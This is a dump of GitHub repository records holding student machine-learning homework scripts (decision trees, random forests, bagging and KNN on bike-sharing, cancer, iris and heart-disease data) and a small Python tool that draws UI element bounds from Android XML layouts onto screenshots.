fitting it to a training dataset. Without cross validation we only have information on how does our model perform to our in-sample data. Ideally we would like to see how does the model perform when we have a new data in terms of accuracy of its predictions.\n\n# In[1]:\n\n\n\n# Importing libraries and packages:\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\n# In[2]:\n\n\nbSharing_df = pd.read_csv('/Users/anitribunyan/Downloads/train.csv')\nbSharing_df.head()\n\n\n# In[3]:\n\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['season','holiday',\n 'workingday','weather','temp',\n 'atemp','humidity','windspeed', 'casual', 'registered']\n\n# use the above list to select the features from the original DataFrame\nX = bSharing_df[feature_cols] \n\n# select a Series of labels (the last column) from the DataFrame\ny = bSharing_df['count']\n\n# print the first 5 rows\nprint(X.head())\nprint(y.head())\n\n\n# In[4]:\n\n\nmy_decisionTree = DecisionTreeClassifier()\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, \n random_state=2)\nmy_decisionTree.fit(X_train, y_train)\ny_predict_dt = my_decisionTree.predict(X_test)\nscore_dt = accuracy_score(y_test, y_predict_dt)\n\n\n# function cross_val_score performs Cross Validation:\naccuracy_list = cross_val_score(my_decisionTree, X, y, cv=10, scoring='accuracy')\n\nprint(score_dt)\nprint(accuracy_list)\n\n\n# In[5]:\n\n\n# use average of accuracy values as final result\naccuracy_cv = accuracy_list.mean()\n\nprint(\"Prediction Accuracy Using DecisionTree & Cross_Validation: \" + str(accuracy_cv))\n\n\n# # Predicting With RandomForest Classifier\n\n# In[10]:\n\n\nmy_RandomForest = RandomForestClassifier(n_estimators = 100, bootstrap = True, random_state=3)\nmy_RandomForest.fit(X_train, y_train)\ny_predict_RF = my_RandomForest.predict(X_test)\naccuracy_RF =accuracy_score(y_test, y_predict_RF)\n\n# function cross_val_score performs Cross Validation:\nrf_accuracy_list = cross_val_score(my_decisionTree, X, y, cv=10, scoring='accuracy')\naccuracy_rf = rf_accuracy_list.mean()\n\nprint(\"Prediction Accuracy with RandomForest Using Cross_Validation: \" + str(accuracy_rf))\nprint(\"Prediction Accuracy using only RandomForest Classifier: \" + str(accuracy_RF))\n\n" }, { "alpha_fraction": 0.7278499007225037, "alphanum_fraction": 0.7388167381286621, "avg_line_length": 26.484127044677734, "blob_id": "80e362df6935ad6514c688d8930cbbef252405a8", "content_id": "75fa10315f56ef6d832c149fc196db811dda9514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3469, "license_type": "no_license", "max_line_length": 103, "num_lines": 126, "path": "/Cancer Diagnosis Using Machine Learning.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[43]:\n\n\n# Vrezh Khalatyan HW4 Question 1\n# Importing libraries and packages:\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cluster import KMeans\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\n# In[44]:\n\n\n# reading a CSV file directly from Web (or local drive), and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local drive:\n\ncancer = pd.read_csv('/Users/anitribunyan/Downloads/HW4/Cancer.csv')\n\ncancer.head()\n\n\n# In[45]:\n\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['Clump_Thickness','Uniformity_of_Cell_Size','Uniformity_of_Cell_Shape',\n 'Marginal_Adhesion','Single_Epithelial_Cell_Size','Bare_Nuclei',\n 'Bland_Chromatin','Normal_Nucleoli','Mitoses']\n\n# use the above list to select the features from the original DataFrame\nX = cancer[feature_cols] \n\n# select a Series of labels (the last column) from the DataFrame\ny = cancer['Malignant_Cancer']\n\n# Randomly splitting the original dataset into training set and testing set:\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.35, random_state=3)\n\n# print the size of the traning set:\nprint(X_train.shape)\nprint(y_train.shape)\n\n# print the size of the testing set:\nprint(X_test.shape)\nprint(y_test.shape)\n\n\n# In[46]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import accuracy_score\n\nmy_DecisionTree = DecisionTreeClassifier(random_state=3)\n\nmy_DecisionTree.fit(X_train, y_train)\n\ny_predict_dt = my_DecisionTree.predict(X_test)\n\nscore_dt = accuracy_score(y_test, y_predict_dt)\n\nprint(\"Decision Tree Accuracy: \" + str(score_dt))\n\n\n# In[47]:\n\n\nfrom sklearn.utils import resample\nfrom sklearn.metrics import accuracy_score\n#from sklearn.ensemble import VotingClassifier\n#perform a new Ensemble Learning method called “Bagging”\npredData = pd.DataFrame()\nfor i in range(19):\n bootstrap_size = int(0.8*len(X_train))\n resample_X_train = resample(X_train, n_samples = bootstrap_size , random_state=i , replace = True)\n resample_y_train = resample(y_train, n_samples = bootstrap_size , random_state=i , replace = True) \n Base_DecisionTree = DecisionTreeClassifier(random_state=3)\n Base_DecisionTree.fit(resample_X_train, resample_y_train)\n predData[str(i)] = Base_DecisionTree.predict(X_test) \n\n\n# In[48]:\n\n\n#Performing voting on prediction results\nsampleSum = pd.Series(predData.sum(axis=1))\npredData = predData.assign(count = sampleSum)\npredAccuracy = []\n\nfor i in range(len(predData)):\n if(sampleSum[i]>= 10):\n predAccuracy.append(1)\n else:\n predAccuracy.append(0)\n \npredData = predData.assign(final = pd.Series(predAccuracy))\n\nscorePredData = accuracy_score(y_test, predData['final'])\nprint(\"Final Prediction Score: \" + str(scorePredData))\n\n\n# In[52]:\n\n\nprint(predData)\n\n\n# In[49]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nmy_RandomForest = RandomForestClassifier(n_estimators = 19, bootstrap = True, random_state=3)\nmy_RandomForest.fit(X_train, y_train)\ny_predict_rf = my_RandomForest.predict(X_test)\nscore_rf = accuracy_score(y_test, y_predict_rf)\nprint('Random Forest Accuracy:',score_rf)\n\n" }, { "alpha_fraction": 0.6402642726898193, "alphanum_fraction": 0.6529693603515625, "avg_line_length": 29.469026565551758, "blob_id": "b43ef9c5a82c639d84a884b89c90873e78bf5274", "content_id": "ce7f83aa0d26e53e33884a75e163c3f058dd405d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13794, "license_type": "no_license", "max_line_length": 403, "num_lines": 452, "path": "/Decision Tree for Weather Forecasting_KNN Classification in sklearn.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[4]:\n\n\n#Question2a\n#a- Read the iris dataset from the following URL:https://raw.githubusercontent.com/mpourhoma/CS4661/master/iris.csvand assign it to a Pandas DataFrame as you learned in tutorial Lab2-3.\n# Import the pandas library\nimport pandas as pd\n# creates a empty dataframe\ndf = pd.DataFrame()\n# reading a CSV file directly from Web, and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local device:\ndf = pd.read_csv('https://raw.githubusercontent.com/mpourhoma/CS4661/master/iris.csv')\ndf\n\n\n# In[5]:\n\n\n#Question2b\n# Split the dataset into testing and training sets with the following parameters:test_size=0.4, random_state=6\n# Importing the required packages and libraries\nimport numpy as np\n# Randomly splitting the original dataset into training set and testing set\n# The function\"train_test_split\" from \"sklearn.cross_validation\" library performs random splitting.\n# \"test_size=0.4\" means that pick 40% of data samples for testing set, and the rest (60%) for training set.\nfrom sklearn.model_selection import train_test_split\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['sepal_length','sepal_width','petal_length','petal_width']\n# use the above list to select the features from the original DataFrame\nX = df[feature_cols]\n# select a Series of labels (the last column) from the DataFrame\n# y = idf['label'] # this is the index that we gave to the labels\ny = df['species']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\n# printing the size of the training set\nprint(X_train.shape)\nprint(y_train.shape)\n# printing the size of the testing set\nprint(X_test.shape)\nprint(y_test.shape)\n# printing the actual testing set\nprint(X_test)\nprint('\\n')\nprint(y_test)\n\n\n# In[6]:\n\n\n#Question2c\n# Instantiate a KNN object with K=3, train it on the training set and test it on the testing set.Then, calculate the accuracy of your prediction as you learned in Lab3.\n# The following line will import KNeighborsClassifier \"Class\"\n# KNeighborsClassifier is name of a \"sklearn class\" to perform \"KNN Classification\"\n# Importing the required packages and libraries\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\n# Instantiating another \"object\" of KNeighborsClassifier \"class\" with k=3:\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\n# We use the method \"fit\" of the object along with training dataset and labels to train the model.\nknn.fit(X_train, y_train)\n# We use the method \"predict\" of the *trained* object knn on one or more testing data sample to perform prediction:\ny_predict = knn.predict(X_test)\nprint(y_predict)\n# Checking for the results\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n# Printing the results\nprint(results)\n\n\n# In[7]:\n\n\n#Question2d\n#Repeat part (c) for K=1, K=5, K=7, K=11, K=15, K=27, K=59 (you can simply use a “for loop,”and save the final accuracy results in a list). Does the accuracy always get better byincreasing the value K? \nk = 1\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 1')\nprint('------------------------------------------------------------------')\n\nk = 5\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 5')\nprint('------------------------------------------------------------------')\n\nk = 7\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 7')\nprint('------------------------------------------------------------------')\n\nk = 11\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 11')\nprint('------------------------------------------------------------------')\n\nk = 15\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 15')\nprint('------------------------------------------------------------------')\n\nk = 27\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 27')\nprint('------------------------------------------------------------------')\n\nk = 59\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 59')\nprint('------------------------------------------------------------------')\n\nprint('The accuracy does not get better as k increases and also not good when k is too small. ' + '\\n' + 'At k=1, there where 3 mistakes; at k=5, there was 1 mistake; ' + '\\n' + 'at k=7, there was 2 mistakes; at k=11 there where 2 mistakes; ' + '\\n' + 'at k=15, there where 4 mistakes; at k=27, there where 5 mistakes;' + '\\n' + ' and at k=59, there where 11 mistakes.')\n\n\n\n\n# In[8]:\n\n\n#Question2e\n#Prediction on Sepal Length\n# train, test, and evaluate your model 4 times,each time on a dataset including only one of the features, and save the final accuracyresults in a list).\nfeature_cols = ['sepal_length']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracySepalLength = accuracy_score(y_test, y_predict)\n#print(accuracySepalLength)\n\nprint(results)\nprint('------------------------------------------------------------------')\n\n#Prediction on Sepal Width\nfeature_cols = ['sepal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracySepalWidth = accuracy_score(y_test, y_predict)\nprint(results)\nprint('------------------------------------------------------------------')\n\n#Prediction on Petal Length\nfeature_cols = ['petal_length']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracyPetalLength = accuracy_score(y_test, y_predict)\nprint(results)\nprint('------------------------------------------------------------------')\n\n#Prediction on Petal Width\nfeature_cols = ['petal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracyPetalWidth = accuracy_score(y_test, y_predict)\nprint(results)\nprint('------------------------------------------------------------------')\n\nprint('Final Results')\nprint('--------------')\nlistOfResults = {'Sepal Length':accuracySepalLength,'Sepal Width':accuracySepalWidth, 'Petal Length': accuracyPetalLength, 'Petal Width':accuracyPetalWidth}\nprint(listOfResults)\n\nprint('The best feature is Petal Width and the second best feature is Petal Length')\n\n\n# In[9]:\n\n\n#Question2f\n#Now, we want to repeat part (e), this time using two features. you have to train, test, andevaluate your model for 6 different cases: using (1st and 2nd features), (1st and 3rdfeatures), (1st and 4th features), (2nd and 3rd features), (2nd and 4th features), (3rd and 4thfeatures)! \nfeature_cols = ['sepal_length', 'sepal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy1 = accuracy_score(y_test, y_predict)\n#print(accuracy1)\n#-------------------------------------------------------------------------------------------\nfeature_cols = ['sepal_length', 'petal_length']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy2 = accuracy_score(y_test, y_predict)\n#print(accuracy2)\n#-------------------------------------------------------------------------------------------\n\nfeature_cols = ['sepal_length', 'petal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy3 = accuracy_score(y_test, y_predict)\n#print(accuracy3)\n#-------------------------------------------------------------------------------------------\n\nfeature_cols = ['sepal_width', 'petal_length']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy4 = accuracy_score(y_test, y_predict)\n#print(accuracy4)\n#-------------------------------------------------------------------------------------------\n\nfeature_cols = ['sepal_width', 'petal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy5 = accuracy_score(y_test, y_predict)\n#print(accuracy5)\n#-------------------------------------------------------------------------------------------\n\nfeature_cols = ['petal_length', 'petal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy6 = accuracy_score(y_test, y_predict)\n#print(accuracy6)\n#-------------------------------------------------------------------------------------------\n\nlistOfResults2 = {'Sepal Length/ Sepal Width':accuracy1,'Sepal Length/ Petal Length':accuracy2, 'Sepal Length/ Petal Width': accuracy3, 'Sepal Width/ Petal Length':accuracy4, 'Sepal Width/ Petal Width':accuracy5, 'Petal Length/ Petal Width':accuracy6}\nprint(listOfResults2)\n\nprint('The best feature pair is Sepal Length & Petal Length with accuracy 0.983')\n\n\n# In[10]:\n\n\n#Question2g\n#BigQuestion: Doesthe “best feature pair” from part (f) contain of both “first best feature”and “second best feature” from part (e)? In other word, can we conclude that the “besttwo features” for classification are the first best feature along with the second best featuretogether?\nprint('False Claim! The best feature pair was Sepal Length & Petal Length from question f; however,'+ '\\n' + 'the best feature from question e was Petal Width and the second being Petal Length.'+ '\\n' + 'In conclusion, we cannot say that the best two features for classification are the first best feature along with the second best feature together; eventough; Petal Length was in both best features.')\n\n\n# In[43]:\n\n\n#Question2h\n#Optional Question: Justify your answer for part (g)! If yes, why? If no, why not?\nprint('For the pair accuracy test, this could be due to the length of both Petal and Sepal. Accuracy may work better due to the same components being length and length.' + '\\n' + 'It seems that Petal Length was in both best accuracy results, which contradict this claim')\n\n" }, { "alpha_fraction": 0.6989169716835022, "alphanum_fraction": 0.7104693055152893, "avg_line_length": 21.693988800048828, "blob_id": "98347ba3db994ca15b6c4f38bbd75d0bbd2c0e77", "content_id": "fb654fbbdfefb519f982c9b35f1f2fe6d4c16745", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4155, "license_type": "no_license", "max_line_length": 168, "num_lines": 183, "path": "/Predicting Heart Disease.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\n#Vrezh Khalatyan HW3 Question 1\n# The following line will import LogisticRegression and DecisionTreeClassifier Classes\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.tree import DecisionTreeClassifier\n\n\n# In[2]:\n\n\n# Importing the required packages and libraries\n# we will need numpy and pandas later\nimport numpy as np\nimport pandas as pd\n\n\n# In[3]:\n\n\n# reading a CSV file directly from Web, and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local device:\n\nhearts_df = pd.read_csv('/Users/anitribunyan/Desktop/HW3/Heart_s.csv')\n\n\n# In[4]:\n\n\n# checking the dataset by printing every 10 lines:\nhearts_df[0::10]\n\n\n# In[5]:\n\n\n# Creating the Feature Matrix for iris dataset:\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['Age','RestBP','Chol','RestECG', 'MaxHR', 'Oldpeak']\n\n# use the above list to select the features from the original DataFrame\nX = hearts_df[feature_cols] \n\n# print the first 5 rows\nX.head()\n\n\n# In[6]:\n\n\n# select a Series of labels (the last column) from the DataFrame\ny = hearts_df['AHD']\n\n# checking the label vector by printing every 10 values\ny[::10]\n\n\n# In[7]:\n\n\n# \"my_logreg\" is instantiated as an \"object\" of LogisticRegression \"class\". \n# \"my_decisiontree\" is instantiated as an \"object\" of DecisionTreeClassifier \"class\". \n\n\nmy_logreg = LogisticRegression()\n\nmy_decisiontree = DecisionTreeClassifier(random_state=5)\n\n\n# In[8]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, \n random_state=4)\n\n\n# In[9]:\n\n\n# Training ONLY on the training set:\nfrom sklearn.neighbors import KNeighborsClassifier\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\n\nknn.fit(X, y)\nmy_logreg.fit(X_train, y_train)\nmy_decisiontree.fit(X_train, y_train)\n\n\n# In[10]:\n\n\ny_predict_knn = knn.predict(X_test)\n\ny_predict_lr = my_logreg.predict(X_test)\n\ny_predict_dt = my_decisiontree.predict(X_test)\n\n\n# In[11]:\n\n\n# We can now compare the \"predicted labels\" for the Testing Set with its \"actual labels\" to evaluate the accuracy \n# Function \"accuracy_score\" from \"sklearn.metrics\" will perform the element-to-element comparision and returns the \n# portion of correct predictions:\n\nfrom sklearn.metrics import accuracy_score\n\nscore_knn = accuracy_score(y_test, y_predict_knn)\nscore_lr = accuracy_score(y_test, y_predict_lr)\nscore_dt = accuracy_score(y_test, y_predict_dt)\n\nprint('KNN = ' + str(score_knn))\nprint('Logistic Regression = ' + str(score_lr))\nprint('Decision Tree = ' + str(score_dt))\nprint('\\n')\nprint('The best accuracy is with KNN and the worst is with the Decision Tree')\n\n\n# In[12]:\n\n\n#perform a feature engineering process called OneHotEncoding for the categorical features\nX = pd.get_dummies(hearts_df)\nX.head()\n\n\n# In[13]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, \n random_state=4)\n\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\n\nknn.fit(X, y)\nmy_logreg.fit(X_train, y_train)\nmy_decisiontree.fit(X_train, y_train)\n\ny_predict_knn = knn.predict(X_test)\n\ny_predict_lr = my_logreg.predict(X_test)\n\ny_predict_dt = my_decisiontree.predict(X_test)\n\nscore_knn = accuracy_score(y_test, y_predict_knn)\nscore_lr = accuracy_score(y_test, y_predict_lr)\nscore_dt = accuracy_score(y_test, y_predict_dt)\n\nprint('KNN = ' + str(score_knn))\nprint('Logistic Regression = ' + str(score_lr))\nprint('Decision Tree = ' + str(score_dt))\nprint('\\n')\nprint('The prediction accuracy for KNN is the same; however, for both Logistic Regression and Decision Tree the accuracy is 1.0, which can be the cause of overfitting')\n\n\n# In[14]:\n\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import metrics\n\nmy_logreg = LogisticRegression()\n\n# function cross_val_score performs Cross Validation:\naccuracy_list = cross_val_score(my_logreg, X, y, cv=10, scoring='accuracy')\n\nprint(accuracy_list)\n\n\naccuracy_cv = accuracy_list.mean()\n\nprint(accuracy_cv)\n\n" } ]
7
Waxmard/skillstest
https://github.com/Waxmard/skillstest
3a4f0e93e8e8b1403858baf631dfd36fa68f4f64
2d4865ef4e7021b0d28efbb933362ea89c33a702
e72235ba02ea0688e74d4efa068ac88d4264a24a
refs/heads/main
2023-07-23T01:20:17.029273
2021-09-07T19:05:25
2021-09-07T19:05:25
402,566,526
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7520798444747925, "alphanum_fraction": 0.7637271285057068, "avg_line_length": 45.30769348144531, "blob_id": "11b7e818e8f21c0906af9d610facb791058376ac", "content_id": "66eada452753f568fe9034ac77583df5597a387b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 601, "license_type": "no_license", "max_line_length": 184, "num_lines": 13, "path": "/README.md", "repo_name": "Waxmard/skillstest", "src_encoding": "UTF-8", "text": "# Programming Assignment #1\n\n### This project takes screenshots from an Android phone (and their respective xml files) and outputs the same screenshots with their leaf-level components highlighted in yellow boxes.\n\n\n## Dependencies\n- This project needs `python3.9` or a later version to run properly.\n- `pillow` and `xml.etree.ElementTree` are the only imports, and both should work as long as `python3.9` is being used.\n\n## To Run\n- You must be in the `Programming-Assignment-Data` folder.\n- Run `python3.9 solution.py`\n- Ideally this project would be run on MacOS, since it was only tested on MacOS." }, { "alpha_fraction": 0.6061288714408875, "alphanum_fraction": 0.6255069971084595, "avg_line_length": 31.647058486938477, "blob_id": "7bcf39fbadc3c2b1efdb3a755233e4d2e3f942f0", "content_id": "d08552cad427e437b7a4284dcf3dc6f6fc202684", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2219, "license_type": "no_license", "max_line_length": 139, "num_lines": 68, "path": "/Programming-Assignment-Data/solution.py", "repo_name": "Waxmard/skillstest", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as ET\nfrom PIL import Image, ImageDraw\n\nxmlFiles = ['com.apalon.ringtones.xml',\n 'com.dropbox.android.xml',\n 'com.giphy.messenger-1.xml',\n 'com.giphy.messenger-2.xml',\n 'com.google.android.apps.transalte.xml',\n 'com.pandora.android.xml',\n 'com.yelp.android.xml']\n\ndef main():\n for file in xmlFiles:\n bounds = xmlParse(file)\n painter(bounds, file)\n\n# returns significant pixel bounds into a list of lists, each list has 4 coordinates of the corners of the rectangle that need to be drawn \ndef xmlParse(currentFile):\n\n # uses element tree to parse the xml file and saves root to root\n tree = ET.parse(currentFile)\n root = tree.getroot()\n\n # saves all string bounds from each node to allbounds\n allbounds = []\n for node in root.iter():\n attributes = node.attrib\n bounds = attributes.get('bounds')\n # [0,0][1440,2368] is always the edge of the screen, this highlight is trivial and not needed\n if (bounds is not None) and (bounds != \"[0,0][1440,2368]\"):\n allbounds.append(bounds)\n\n return convertInt(allbounds)\n\n# converts the string bounds from allbounds into lists (of 4 integer coordinates)\ndef convertInt(stringBounds):\n intbounds = []\n for bound in stringBounds:\n bound = bound.split(',')\n bound[0] = int(bound[0][1:])\n bound[2] = int(bound[2][:-1])\n tmp = bound[1].split(']')\n bound[1] = int(tmp[0])\n bound.insert(2, tmp[1])\n bound[2] = int(bound[2][1:])\n intbounds.append(bound)\n return intbounds\n\n# draws the rectangles on the image then outputs it in Preview\ndef painter(bounds, currentFile):\n # imageFile is the xml files' string name with .png extension instead of .xml\n imageFile = currentFile.replace('xml', 'png')\n\n img = Image.open(imageFile)\n draw = ImageDraw.Draw(img)\n \n # draws rectangle over all significant bounds specified within xml file\n for bound in bounds:\n draw.rectangle(\n (bound[0], bound[1], bound[2], bound[3]),\n outline=('yellow'),\n width=5\n )\n\n img.show()\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5875952243804932, "alphanum_fraction": 0.5941240191459656, "avg_line_length": 23.864864349365234, "blob_id": "8ce78b4ffc2f5172d34e412f30835333cd280bff", "content_id": "afcae6ed06160e444149c66e816c4f7036566234", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 919, "license_type": "no_license", "max_line_length": 84, "num_lines": 37, "path": "/practice.py", "repo_name": "Waxmard/skillstest", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as ET\n\ndef practice():\n tree = ET.parse('../practice/movies.xml')\n root = tree.getroot()\n\n # for child in root:\n # print(child.tag, child.attrib)\n\n # print([elem.tag for elem in root.iter()])\n # print()\n # print(ET.tostring(root, encoding='utf8').decode('utf8'))\n # for movie in root.iter('movie'):\n # print(movie.attrib)\n\n print()\n for description in root.iter('description'):\n print(description.text)\n\n # print()\n # for movie in root.findall(\"./genre/decade/movie/[year='1992']\"):\n # print(movie.attrib)\n\n # print()\n # for movie in root.findall(\"./genre/decade/movie/format/[@multiple='Yes']...\"):\n # print(movie.attrib)\n\ndef main():\n tree = ET.parse('com.apalon.ringtones.xml')\n root = tree.getroot()\n\n for child in root:\n print(child.tag, child.attrib)\n\n\nif __name__ == \"__main__\":\n practice()" } ]
3
KirillShmilovich/graphlets
https://github.com/KirillShmilovich/graphlets
8264d879c27382d2962b7b0971dff6da36d1adae
724d50666968ee755ca2ff1b172664c2233d2174
27647a6fee0c023063e019dd2b236507bfadf22f
refs/heads/master
2020-07-05T23:18:10.533978
2019-08-28T23:30:46
2019-08-28T23:30:46
202,813,922
8
0
null
null
null
null
null
